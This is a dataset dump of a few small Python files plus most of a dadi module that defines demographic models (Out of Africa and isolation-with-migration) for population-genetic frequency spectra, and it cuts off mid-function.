| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 11
|
99e1425755a55dae5584d6ebce190088e52a386e
| 40
|
py
|
Python
|
Python/Tests/TestData/RemoveImport/EmptyFuncDef2.py
|
nanshuiyu/pytools
|
9f9271fe8cf564b4f94e9456d400f4306ea77c23
|
[
"Apache-2.0"
] | null | null | null |
Python/Tests/TestData/RemoveImport/EmptyFuncDef2.py
|
nanshuiyu/pytools
|
9f9271fe8cf564b4f94e9456d400f4306ea77c23
|
[
"Apache-2.0"
] | null | null | null |
Python/Tests/TestData/RemoveImport/EmptyFuncDef2.py
|
nanshuiyu/pytools
|
9f9271fe8cf564b4f94e9456d400f4306ea77c23
|
[
"Apache-2.0"
] | null | null | null |
def f():
import fob
import oar
| 13.333333
| 15
| 0.55
| 6
| 40
| 3.666667
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.375
| 40
| 3
| 16
| 13.333333
| 0.88
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.666667
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8230886a2a3cb27a9fe719a9a8515e6855890612
| 112
|
py
|
Python
|
demos/demo_T9.py
|
kul-group/MAZE-sim
|
0f85e74bf93f9242a73bcfaa20a593ae966f38fa
|
[
"MIT"
] | 13
|
2021-03-10T18:40:32.000Z
|
2022-03-21T20:40:57.000Z
|
demos/demo_T9.py
|
kul-group/MAZE-sim
|
0f85e74bf93f9242a73bcfaa20a593ae966f38fa
|
[
"MIT"
] | 27
|
2021-01-28T23:18:44.000Z
|
2021-05-06T19:33:09.000Z
|
demos/demo_T9.py
|
kul-group/MAZE-sim
|
0f85e74bf93f9242a73bcfaa20a593ae966f38fa
|
[
"MIT"
] | 4
|
2021-03-19T20:46:15.000Z
|
2022-03-21T20:40:59.000Z
|
#T9 surrounded with 4 OH's 1 Tcluster O-Si-OH
# T9 surrounded with 4 Si-OH3
# 1 T cluster, and a 5 T cluster
| 18.666667
| 46
| 0.696429
| 25
| 112
| 3.12
| 0.64
| 0.307692
| 0.410256
| 0.435897
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093023
| 0.232143
| 112
| 6
| 47
| 18.666667
| 0.813953
| 0.928571
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
41c476cce5ed340c7cdf8aacfdc52221ceae5609
| 174
|
py
|
Python
|
config_generation/__init__.py
|
mhqz/deflect
|
ea1ffeb77a867185f287b56810a49455b2fff8ff
|
[
"CC-BY-4.0"
] | null | null | null |
config_generation/__init__.py
|
mhqz/deflect
|
ea1ffeb77a867185f287b56810a49455b2fff8ff
|
[
"CC-BY-4.0"
] | null | null | null |
config_generation/__init__.py
|
mhqz/deflect
|
ea1ffeb77a867185f287b56810a49455b2fff8ff
|
[
"CC-BY-4.0"
] | null | null | null |
from config_generation.bind import generate_bind_config
from config_generation.nginx import generate_nginx_config
from config_generation.banjax import generate_banjax_config
| 43.5
| 59
| 0.913793
| 24
| 174
| 6.25
| 0.333333
| 0.2
| 0.4
| 0.346667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.068966
| 174
| 3
| 60
| 58
| 0.925926
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
41c6435008b20d4d5326eccc0b19caff3e26269f
| 33,020
|
py
|
Python
|
dadiStuff/dadiFunctions.py
|
kern-lab/shanku_et_al
|
5d8a1bd9f273a7023b4be48d5fc9610f65ecb295
|
[
"MIT"
] | null | null | null |
dadiStuff/dadiFunctions.py
|
kern-lab/shanku_et_al
|
5d8a1bd9f273a7023b4be48d5fc9610f65ecb295
|
[
"MIT"
] | null | null | null |
dadiStuff/dadiFunctions.py
|
kern-lab/shanku_et_al
|
5d8a1bd9f273a7023b4be48d5fc9610f65ecb295
|
[
"MIT"
] | null | null | null |
#A collection of functions for dealing with Dadi models
# A. Kern
import dadi
import numpy
import scipy
import pylab
#import nlopt
######### Demographic stuff
def OutOfAfricaGrowB((nuAf, nuEu0, nuEu, nuNA0, nuNA,
TAf, TB, TEuNA, p_misid), (n1,n2,n3), pts):
xx = dadi.Numerics.default_grid(pts)
phi = dadi.PhiManip.phi_1D(xx)
phi = dadi.Integration.one_pop(phi, xx, TAf, nu=nuAf)
phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/(TB+TEuNA))
phi = dadi.Integration.two_pops(phi, xx, TB, nu1=nuAf, nu2=nuEu_func,
m12=0, m21=0)
nuEu0 = nuEu_func(TB)
phi = dadi.PhiManip.phi_2D_to_3D_split_2(xx, phi)
nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/(TEuNA))
nuNA_func = lambda t: nuNA0*(nuNA/nuNA0)**(t/TEuNA)
phi = dadi.Integration.three_pops(phi, xx, TEuNA, nu1=nuAf,
nu2=nuEu_func, nu3=nuNA_func,
m12=0, m13=0, m21=0, m23=0,
m31=0, m32=0)
fs = dadi.Spectrum.from_phi(phi, (n1,n2,n3), (xx,xx,xx))
return (1-p_misid)*fs + p_misid * dadi.Numerics.reverse_array(fs)
def OutOfAfrica_admix((nuAf, nuEu0, nuEu, nuNA0, nuNA,
TAf, TB, TEuNA,T_ad, p_ad, p_misid), (n1,n2,n3), pts):
xx = dadi.Numerics.default_grid(pts)
phi = dadi.PhiManip.phi_1D(xx)
phi = dadi.Integration.one_pop(phi, xx, TAf, nu=nuAf)
phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/(TB+TEuNA+T_ad))
phi = dadi.Integration.two_pops(phi, xx, TB, nu1=nuAf, nu2=nuEu_func,
m12=0, m21=0)
nuEu0 = nuEu_func(TB)
phi = dadi.PhiManip.phi_2D_to_3D_split_2(xx, phi)
nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/(TEuNA+T_ad))
nuNA_func = lambda t: nuNA0*(nuNA/nuNA0)**(t/TEuNA+T_ad)
phi = dadi.Integration.three_pops(phi, xx, TEuNA, nu1=nuAf,
nu2=nuEu_func, nu3=nuNA_func,
m12=0, m13=0, m21=0, m23=0,
m31=0, m32=0)
nuEu0 = nuEu_func(TEuNA)
nuNA0 = nuNA_func(TEuNA)
phi = dadi.PhiManip.phi_3D_admix_1_and_2_into_3(phi, p_ad,0, xx,xx,xx)
nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/T_ad)
nuNA_func = lambda t: nuNA0*(nuNA/nuNA0)**(t/T_ad)
phi = dadi.Integration.three_pops(phi, xx, T_ad, nu1=nuAf,
nu2=nuEu_func, nu3=nuNA_func,
m12=0, m13=0, m21=0, m23=0,
m31=0, m32=0)
fs = dadi.Spectrum.from_phi(phi, (n1,n2,n3), (xx,xx,xx))
return (1-p_misid)*fs + p_misid * dadi.Numerics.reverse_array(fs)
def OutOfAfrica_mig_Af_NA((nuAf, nuEu0, nuEu, nuNA0, nuNA,
TAf, TB, TEuNA,mNA_Af,mAf_NA, p_misid), (n1,n2,n3), pts):
xx = dadi.Numerics.default_grid(pts)
phi = dadi.PhiManip.phi_1D(xx)
phi = dadi.Integration.one_pop(phi, xx, TAf, nu=nuAf)
phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/(TB+TEuNA))
phi = dadi.Integration.two_pops(phi, xx, TB, nu1=nuAf, nu2=nuEu_func,
m12=0, m21=0)
nuEu0 = nuEu_func(TB)
phi = dadi.PhiManip.phi_2D_to_3D_split_2(xx, phi)
nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/(TEuNA))
nuNA_func = lambda t: nuNA0*(nuNA/nuNA0)**(t/TEuNA)
phi = dadi.Integration.three_pops(phi, xx, TEuNA, nu1=nuAf,
nu2=nuEu_func, nu3=nuNA_func,
m12=0, m13=mAf_NA, m21=0, m23=0,
m31=mNA_Af, m32=0)
fs = dadi.Spectrum.from_phi(phi, (n1,n2,n3), (xx,xx,xx))
return (1-p_misid)*fs + p_misid * dadi.Numerics.reverse_array(fs)
def OutOfAfrica_mig((nuAf, nuEu0, nuEu, nuNA0, nuNA,
TAf, TB, TEuNA,mAf_Eu,mAf_NA,mEu_Af,mEu_NA,mNA_Af,mNA_Eu, p_misid), (n1,n2,n3), pts):
xx = dadi.Numerics.default_grid(pts)
phi = dadi.PhiManip.phi_1D(xx)
phi = dadi.Integration.one_pop(phi, xx, TAf, nu=nuAf)
phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/(TB+TEuNA))
phi = dadi.Integration.two_pops(phi, xx, TB, nu1=nuAf, nu2=nuEu_func,
m12=mAf_Eu, m21=mEu_Af)
nuEu0 = nuEu_func(TB)
phi = dadi.PhiManip.phi_2D_to_3D_split_2(xx, phi)
nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/(TEuNA))
nuNA_func = lambda t: nuNA0*(nuNA/nuNA0)**(t/TEuNA)
phi = dadi.Integration.three_pops(phi, xx, TEuNA, nu1=nuAf,
nu2=nuEu_func, nu3=nuNA_func,
m12=mAf_Eu, m13=mAf_NA, m21=mEu_Af, m23=mEu_NA,
m31=mNA_Af, m32=mNA_Eu)
fs = dadi.Spectrum.from_phi(phi, (n1,n2,n3), (xx,xx,xx))
return (1-p_misid)*fs + p_misid * dadi.Numerics.reverse_array(fs)
def OutOfAfrica_mig_noAncient((nuAf, nuEu0, nuEu, nuNA0, nuNA,
TAf, TB, TEuNA,mAf_Eu,mAf_NA,mEu_Af,mEu_NA,mNA_Af,mNA_Eu, p_misid), (n1,n2,n3), pts):
xx = dadi.Numerics.default_grid(pts)
phi = dadi.PhiManip.phi_1D(xx)
phi = dadi.Integration.one_pop(phi, xx, TAf, nu=nuAf)
phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/(TB+TEuNA))
phi = dadi.Integration.two_pops(phi, xx, TB, nu1=nuAf, nu2=nuEu_func,
m12=0, m21=0)
nuEu0 = nuEu_func(TB)
phi = dadi.PhiManip.phi_2D_to_3D_split_2(xx, phi)
nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/(TEuNA))
nuNA_func = lambda t: nuNA0*(nuNA/nuNA0)**(t/TEuNA)
phi = dadi.Integration.three_pops(phi, xx, TEuNA, nu1=nuAf,
nu2=nuEu_func, nu3=nuNA_func,
m12=mAf_Eu, m13=mAf_NA, m21=mEu_Af, m23=mEu_NA,
m31=mNA_Af, m32=mNA_Eu)
fs = dadi.Spectrum.from_phi(phi, (n1,n2,n3), (xx,xx,xx))
return (1-p_misid)*fs + p_misid * dadi.Numerics.reverse_array(fs)
def OutOfAfrica_mig_admix((nuAf, nuEu0, nuEu, nuNA0, nuNA,
TAf, TB, TEuNA,T_ad,p_ad,mAf_Eu,mAf_NA,mEu_Af,mEu_NA,mNA_Af,mNA_Eu, p_misid), (n1,n2,n3), pts):
xx = dadi.Numerics.default_grid(pts)
phi = dadi.PhiManip.phi_1D(xx)
phi = dadi.Integration.one_pop(phi, xx, TAf, nu=nuAf)
phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/(TB+TEuNA+T_ad))
phi = dadi.Integration.two_pops(phi, xx, TB, nu1=nuAf, nu2=nuEu_func,
m12=mAf_Eu, m21=mEu_Af)
nuEu0 = nuEu_func(TB)
phi = dadi.PhiManip.phi_2D_to_3D_split_2(xx, phi)
nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/(TEuNA+T_ad))
nuNA_func = lambda t: nuNA0*(nuNA/nuNA0)**(t/TEuNA+T_ad)
phi = dadi.Integration.three_pops(phi, xx, TEuNA, nu1=nuAf,
nu2=nuEu_func, nu3=nuNA_func,
m12=mAf_Eu, m13=mAf_NA, m21=mEu_Af, m23=mEu_NA,
m31=mNA_Af, m32=mNA_Eu)
nuEu0 = nuEu_func(TEuNA)
nuNA0 = nuNA_func(TEuNA)
phi = dadi.PhiManip.phi_3D_admix_1_and_2_into_3(phi, p_ad,0, xx,xx,xx)
nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/T_ad)
nuNA_func = lambda t: nuNA0*(nuNA/nuNA0)**(t/T_ad)
phi = dadi.Integration.three_pops(phi, xx, T_ad, nu1=nuAf,
nu2=nuEu_func, nu3=nuNA_func,
m12=mAf_Eu, m13=mAf_NA, m21=mEu_Af, m23=mEu_NA,
m31=mNA_Af, m32=mNA_Eu)
fs = dadi.Spectrum.from_phi(phi, (n1,n2,n3), (xx,xx,xx))
return (1-p_misid)*fs + p_misid * dadi.Numerics.reverse_array(fs)
def OutOfAfrica2((nuAf, nuEu0, nuEu, nuNA0, nuNA,
TAf, TB, TEuNA, p_misid), (n1,n2,n3), pts):
xx = dadi.Numerics.default_grid(pts)
phi = dadi.PhiManip.phi_1D(xx)
phi = dadi.Integration.one_pop(phi, xx, TAf, nu=nuAf)
phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
phi = dadi.Integration.two_pops(phi, xx, TB, nu1=nuAf, nu2=nuEu0,
m12=0, m21=0)
phi = dadi.PhiManip.phi_2D_to_3D_split_2(xx, phi)
nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/(TEuNA))
nuNA_func = lambda t: nuNA0*(nuNA/nuNA0)**(t/TEuNA)
phi = dadi.Integration.three_pops(phi, xx, TEuNA, nu1=nuAf,
nu2=nuEu_func, nu3=nuNA_func,
m12=0, m13=0, m21=0, m23=0,
m31=0, m32=0)
fs = dadi.Spectrum.from_phi(phi, (n1,n2,n3), (xx,xx,xx))
return (1-p_misid)*fs + p_misid * dadi.Numerics.reverse_array(fs)
def OutOfAfrica2_mig((nuAf, nuEu0, nuEu, nuNA0, nuNA,
TAf, TB, TEuNA,mAf_Eu,mAf_NA,mEu_Af,mEu_NA,mNA_Af,mNA_Eu, p_misid), (n1,n2,n3), pts):
xx = dadi.Numerics.default_grid(pts)
phi = dadi.PhiManip.phi_1D(xx)
phi = dadi.Integration.one_pop(phi, xx, TAf, nu=nuAf)
phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
phi = dadi.Integration.two_pops(phi, xx, TB, nu1=nuAf, nu2=nuEu0,
m12=mAf_Eu, m21=mEu_Af)
phi = dadi.PhiManip.phi_2D_to_3D_split_2(xx, phi)
nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/(TEuNA))
nuNA_func = lambda t: nuNA0*(nuNA/nuNA0)**(t/TEuNA)
phi = dadi.Integration.three_pops(phi, xx, TEuNA, nu1=nuAf,
nu2=nuEu_func, nu3=nuNA_func,
m12=mAf_Eu, m13=mAf_NA, m21=mEu_Af, m23=mEu_NA,
m31=mNA_Af, m32=mNA_Eu)
fs = dadi.Spectrum.from_phi(phi, (n1,n2,n3), (xx,xx,xx))
return (1-p_misid)*fs + p_misid * dadi.Numerics.reverse_array(fs)
def OutOfAfrica2_mig_admix((nuAf, nuEu0, nuEu, nuNA0, nuNA,
TAf, TB, TEuNA,T_ad,p_ad,mAf_Eu,mAf_NA,mEu_Af,mEu_NA,mNA_Af,mNA_Eu, p_misid), (n1,n2,n3), pts):
xx = dadi.Numerics.default_grid(pts)
phi = dadi.PhiManip.phi_1D(xx)
phi = dadi.Integration.one_pop(phi, xx, TAf, nu=nuAf)
phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
phi = dadi.Integration.two_pops(phi, xx, TB, nu1=nuAf, nu2=nuEu0,
m12=mAf_Eu, m21=mEu_Af)
phi = dadi.PhiManip.phi_2D_to_3D_split_2(xx, phi)
nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/(TEuNA+T_ad))
nuNA_func = lambda t: nuNA0*(nuNA/nuNA0)**(t/TEuNA+T_ad)
phi = dadi.Integration.three_pops(phi, xx, TEuNA, nu1=nuAf,
nu2=nuEu_func, nu3=nuNA_func,
m12=mAf_Eu, m13=mAf_NA, m21=mEu_Af, m23=mEu_NA,
m31=mNA_Af, m32=mNA_Eu)
nuEu0 = nuEu_func(TEuNA)
nuNA0 = nuNA_func(TEuNA)
phi = dadi.PhiManip.phi_3D_admix_1_and_2_into_3(phi, p_ad,0, xx,xx,xx)
nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/T_ad)
nuNA_func = lambda t: nuNA0*(nuNA/nuNA0)**(t/T_ad)
phi = dadi.Integration.three_pops(phi, xx, T_ad, nu1=nuAf,
nu2=nuEu_func, nu3=nuNA_func,
m12=mAf_Eu, m13=mAf_NA, m21=mEu_Af, m23=mEu_NA,
m31=mNA_Af, m32=mNA_Eu)
fs = dadi.Spectrum.from_phi(phi, (n1,n2,n3), (xx,xx,xx))
return (1-p_misid)*fs + p_misid * dadi.Numerics.reverse_array(fs)
def OutOfAfrica3((nuAf, nuEu, nuNA,
TAf, TB, TEuNA, p_misid), (n1,n2,n3), pts):
xx = dadi.Numerics.default_grid(pts)
phi = dadi.PhiManip.phi_1D(xx)
phi = dadi.Integration.one_pop(phi, xx, TAf, nu=nuAf)
phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
phi = dadi.Integration.two_pops(phi, xx, TB, nu1=nuAf, nu2=nuEu,
m12=0, m21=0)
phi = dadi.PhiManip.phi_2D_to_3D_split_2(xx, phi)
phi = dadi.Integration.three_pops(phi, xx, TEuNA, nu1=nuAf,
nu2=nuEu, nu3=nuNA,
m12=0, m13=0, m21=0, m23=0,
m31=0, m32=0)
fs = dadi.Spectrum.from_phi(phi, (n1,n2,n3), (xx,xx,xx))
return (1-p_misid)*fs + p_misid * dadi.Numerics.reverse_array(fs)
def OutOfAfrica4((nuAf, nuEu, nuNA,
TAf, TB, TEuNA, p_misid), (n1,n2,n3), pts):
xx = dadi.Numerics.default_grid(pts)
phi = dadi.PhiManip.phi_1D(xx)
phi = dadi.Integration.one_pop(phi, xx, TAf, nu=nuAf)
phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
phi = dadi.Integration.two_pops(phi, xx, TB, nu1=nuAf, nu2=nuEu,
m12=0, m21=0)
phi = dadi.PhiManip.phi_2D_to_3D_split_1(xx, phi)
phi = dadi.Integration.three_pops(phi, xx, TEuNA, nu1=nuAf,
nu2=nuEu, nu3=nuNA,
m12=0, m13=0, m21=0, m23=0,
m31=0, m32=0)
fs = dadi.Spectrum.from_phi(phi, (n1,n2,n3), (xx,xx,xx))
return (1-p_misid)*fs + p_misid * dadi.Numerics.reverse_array(fs)
def OutOfAfrica_mig_admix2((nuAf, nuEu0, nuEu, nuNA0, nuNA,
TAf, TB, TEuNA,T_ad,mAf_Eu,mAf_NA,mEu_Af,mEu_NA,mNA_Af,mNA_Eu, p_misid), (n1,n2,n3), pts):
xx = dadi.Numerics.default_grid(pts)
phi = dadi.PhiManip.phi_1D(xx)
phi = dadi.Integration.one_pop(phi, xx, TAf, nu=nuAf)
phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/(TB+TEuNA+T_ad))
phi = dadi.Integration.two_pops(phi, xx, TB, nu1=nuAf, nu2=nuEu_func,
m12=mAf_Eu, m21=mEu_Af)
nuEu0 = nuEu_func(TB)
phi = dadi.PhiManip.phi_2D_to_3D_admix(phi,p_ad,xx,xx,xx)
nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/TEuNA)
nuNA_func = lambda t: nuNA0*(nuNA/nuNA0)**(t/TEuNA)
phi = dadi.Integration.three_pops(phi, xx, TEuNA, nu1=nuAf,
nu2=nuEu_func, nu3=nuNA_func,
m12=mAf_Eu, m13=mAf_NA, m21=mEu_Af, m23=mEu_NA,
m31=mNA_Af, m32=mNA_Eu)
fs = dadi.Spectrum.from_phi(phi, (n1,n2,n3), (xx,xx,xx))
return (1-p_misid)*fs + p_misid * dadi.Numerics.reverse_array(fs)
###################################################
################## Two Populations
##two population model with misorientation
def IM_misorient_5epoch(params, ns, pts):
"""
ns = (n1,n2)
params = (nu1_0,nu1_1,nu1_2,nu1_3,nu1_4,nu2_0,nu2_1,nu2_2,nu2_3,nu2_4,t0,t1,t2,t3,t4,m12,m21,p_misid)
Isolation-with-migration model with exponential pop growth.
nu1_0: Size of pop 1 after split.
nu2_0: Size of pop 2 after split.
nu1: Final size of pop 1.
nu2: Final size of pop 2.
T: Time in the past of split (in units of 2*Na generations)
m12: Migration from pop 2 to pop 1 (2*Na*m12)
m21: Migration from pop 1 to pop 2
n1,n2: Sample sizes of resulting Spectrum
pts: Number of grid points to use in integration.
"""
nu1_0,nu1_1,nu1_2,nu1_3,nu1_4,nu2_0,nu2_1,nu2_2,nu2_3,nu2_4,t0,t1,t2,t3,t4,m12,m21,p_misid = params
xx = dadi.Numerics.default_grid(pts)
phi = dadi.PhiManip.phi_1D(xx)
phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
phi = dadi.Integration.two_pops(phi, xx, t0, nu1_0, nu2_0,
m12=m12, m21=m21)
phi = dadi.Integration.two_pops(phi, xx, t1, nu1_1, nu2_1,
m12=m12, m21=m21)
phi = dadi.Integration.two_pops(phi, xx, t2, nu1_2, nu2_2,
m12=m12, m21=m21)
phi = dadi.Integration.two_pops(phi, xx, t3, nu1_3, nu2_3,
m12=m12, m21=m21)
phi = dadi.Integration.two_pops(phi, xx, t4, nu1_4, nu2_4,
m12=m12, m21=m21)
fs = dadi.Spectrum.from_phi(phi, ns, (xx,xx))
return (1-p_misid)*fs + p_misid * dadi.Numerics.reverse_array(fs)
##two population model with misorientation
def IM_misorient(params, ns, pts):
"""
ns = (n1,n2)
params = (nu1_0,nu2_0,nu1,nu2,T,m12,m21,p_misid)
Isolation-with-migration model with exponential pop growth.
nu1_0: Size of pop 1 after split.
nu2_0: Size of pop 2 after split.
nu1: Final size of pop 1.
nu2: Final size of pop 2.
T: Time in the past of split (in units of 2*Na generations)
m12: Migration from pop 2 to pop 1 (2*Na*m12)
m21: Migration from pop 1 to pop 2
n1,n2: Sample sizes of resulting Spectrum
pts: Number of grid points to use in integration.
"""
nu1_0,nu2_0,nu1,nu2,T,m12,m21,p_misid = params
xx = dadi.Numerics.default_grid(pts)
phi = dadi.PhiManip.phi_1D(xx)
phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
nu1_func = lambda t: nu1_0 * (nu1/nu1_0)**(t/T)
nu2_func = lambda t: nu2_0 * (nu2/nu2_0)**(t/T)
phi = dadi.Integration.two_pops(phi, xx, T, nu1_func, nu2_func,
m12=m12, m21=m21)
fs = dadi.Spectrum.from_phi(phi, ns, (xx,xx))
return (1-p_misid)*fs + p_misid * dadi.Numerics.reverse_array(fs)
##two population model with misorientation
def IM_misorient_noMig(params, ns, pts):
"""
ns = (n1,n2)
params = (nu1_0,nu2_0,nu1,nu2,T,m12,m21,p_misid)
Isolation-with-migration model with exponential pop growth.
nu1_0: Size of pop 1 after split.
nu2_0: Size of pop 2 after split.
nu1: Final size of pop 1.
nu2: Final size of pop 2.
T: Time in the past of split (in units of 2*Na generations)
n1,n2: Sample sizes of resulting Spectrum
pts: Number of grid points to use in integration.
"""
nu1_0,nu2_0,nu1,nu2,T,p_misid = params
xx = dadi.Numerics.default_grid(pts)
phi = dadi.PhiManip.phi_1D(xx)
phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
nu1_func = lambda t: nu1_0 * (nu1/nu1_0)**(t/T)
nu2_func = lambda t: nu2_0 * (nu2/nu2_0)**(t/T)
phi = dadi.Integration.two_pops(phi, xx, T, nu1_func, nu2_func,
m12=0, m21=0)
fs = dadi.Spectrum.from_phi(phi, ns, (xx,xx))
return (1-p_misid)*fs + p_misid * dadi.Numerics.reverse_array(fs)
##two population model with misorientation
def IM_misorient_admix(params, ns, pts):
"""
ns = (n1,n2)
params = (nu1_0,nu2_0,nu1,nu2,T,m12,m21,t_ad,p_ad,p_misid)
Isolation-with-migration model with exponential pop growth.
nu1_0: Size of pop 1 after split.
nu2_0: Size of pop 2 after split.
nu1: Final size of pop 1.
nu2: Final size of pop 2.
T: Time in the past of split (in units of 2*Na generations)
m12: Migration from pop 2 to pop 1 (2*Na*m12)
m21: Migration from pop 1 to pop 2
n1,n2: Sample sizes of resulting Spectrum
pts: Number of grid points to use in integration.
"""
nu1_0,nu2_0,nu1,nu2,T,m12,m21,t_ad,p_ad,p_misid = params
xx = dadi.Numerics.default_grid(pts)
phi = dadi.PhiManip.phi_1D(xx)
phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
nu1_func = lambda t: nu1_0 * (nu1/nu1_0)**(t/(T+t_ad))
nu2_func = lambda t: nu2_0 * (nu2/nu2_0)**(t/(T+t_ad))
phi = dadi.Integration.two_pops(phi, xx, T, nu1_func, nu2_func,
m12=m12, m21=m21)
phi = dadi.PhiManip.phi_2D_admix_1_into_2(phi, p_ad, xx,xx)
nu1_0 = nu1_func(t_ad)
nu2_0 = nu2_func(t_ad)
nu1_func = lambda t: nu1_0 * (nu1/nu1_0)**(t/t_ad)
nu2_func = lambda t: nu2_0 * (nu2/nu2_0)**(t/t_ad)
phi = dadi.Integration.two_pops(phi, xx, t_ad, nu1_func, nu2_func,
m12=m12, m21=m21)
fs = dadi.Spectrum.from_phi(phi, ns, (xx,xx))
return (1-p_misid)*fs + p_misid * dadi.Numerics.reverse_array(fs)
##two population model with misorientation
def IM_misorient_doubleAdmix(params, ns, pts):
"""
ns = (n1,n2)
params = (nu1_0,nu2_0,nu1,nu2,T,m12,m21,t_ad1,p_ad1,t_ad2,p_ad2,p_misid)
Isolation-with-migration model with exponential pop growth.
nu1_0: Size of pop 1 after split.
nu2_0: Size of pop 2 after split.
nu1: Final size of pop 1.
nu2: Final size of pop 2.
T: Time in the past of split (in units of 2*Na generations)
m12: Migration from pop 2 to pop 1 (2*Na*m12)
m21: Migration from pop 1 to pop 2
n1,n2: Sample sizes of resulting Spectrum
pts: Number of grid points to use in integration.
"""
nu1_0,nu2_0,nu1,nu2,T,m12,m21,t_ad1,p_ad1,t_ad2,p_ad2,p_misid = params
xx = dadi.Numerics.default_grid(pts)
phi = dadi.PhiManip.phi_1D(xx)
phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
nu1_func = lambda t: nu1_0 * (nu1/nu1_0)**(t/(T+t_ad1+t_ad2))
nu2_func = lambda t: nu2_0 * (nu2/nu2_0)**(t/(T+t_ad1+t_ad2))
phi = dadi.Integration.two_pops(phi, xx, T, nu1_func, nu2_func,
m12=m12, m21=m21)
phi = dadi.PhiManip.phi_2D_admix_1_into_2(phi, p_ad1, xx,xx)
nu1_0 = nu1_func(t_ad1)
nu2_0 = nu2_func(t_ad1)
nu1_func = lambda t: nu1_0 * (nu1/nu1_0)**(t/t_ad1+t_ad2)
nu2_func = lambda t: nu2_0 * (nu2/nu2_0)**(t/t_ad1+t_ad2)
phi = dadi.Integration.two_pops(phi, xx, t_ad1, nu1_func, nu2_func,
m12=m12, m21=m21)
phi = dadi.PhiManip.phi_2D_admix_1_into_2(phi, p_ad2, xx,xx)
nu1_0 = nu1_func(t_ad2)
nu2_0 = nu2_func(t_ad2)
nu1_func = lambda t: nu1_0 * (nu1/nu1_0)**(t/t_ad2)
nu2_func = lambda t: nu2_0 * (nu2/nu2_0)**(t/t_ad2)
phi = dadi.Integration.two_pops(phi, xx, t_ad2, nu1_func, nu2_func,
m12=m12, m21=m21)
fs = dadi.Spectrum.from_phi(phi, ns, (xx,xx))
return (1-p_misid)*fs + p_misid * dadi.Numerics.reverse_array(fs)
##two population model with misorientation
def IM_misorient_doubleAdmix_noMig(params, ns, pts):
"""
ns = (n1,n2)
params = (nu1_0,nu2_0,nu1,nu2,T,m12,m21,t_ad1,p_ad1,t_ad2,p_ad2,p_misid)
Isolation-with-migration model with exponential pop growth.
nu1_0: Size of pop 1 after split.
nu2_0: Size of pop 2 after split.
nu1: Final size of pop 1.
nu2: Final size of pop 2.
T: Time in the past of split (in units of 2*Na generations)
n1,n2: Sample sizes of resulting Spectrum
pts: Number of grid points to use in integration.
"""
nu1_0,nu2_0,nu1,nu2,T,m12,m21,t_ad1,p_ad1,t_ad2,p_ad2,p_misid = params
xx = dadi.Numerics.default_grid(pts)
phi = dadi.PhiManip.phi_1D(xx)
phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
